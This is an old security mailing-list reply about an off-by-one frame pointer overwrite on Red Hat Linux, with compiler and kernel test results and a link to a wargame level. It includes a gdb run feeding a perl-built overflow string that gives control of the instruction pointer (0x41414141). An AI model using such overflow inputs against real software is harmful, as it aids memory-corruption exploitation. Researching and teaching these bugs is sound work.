Re: Off By One on Red Hat Linux again

[DownBload <downbload () hotmail com>]

In-Reply-To: <20030829144654.29393.qmail () mail supereva it>

TO MODERATOR: Sorry, previous message had error, this is valid message.

> hi again,
>
> i tested frame pointer overwrite vulnerability in redhat linux 7.0 & 7.1 
too...but it
> fails to overwrite LSB of EBP. This distros have gcc-2.96-54 and gcc-2.96-
81; any ideas?
> However a remote off by one exploit (rsyncd) worked successfully in red 
hat 7.1
> and i don't understand because a local scenario fails.
>
> I will test again FP overwrite in other distros (mandrake & suse) and i 
will inform you about
> complete exploitation.
>
> Thank u to Jose Ronnick for immediate response.

Off-by-one should work on rh7.0. 
I tested it on rh 6.1 with egcs-2.91.66 (2.2.12-20 kernel) and debian 3.0 
with gcc 2.95.4 (2.4.21 kernel). It worked on both.

You can download off-by-one example here:
http://www.ii-labs.org/wargame/levels/level15.c

gdb ./level15
....
....
r `perl -e 'print "A"x250; print "\x4c" x 500'`
...
...
(no debugging symbols found)...(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) q

It worked....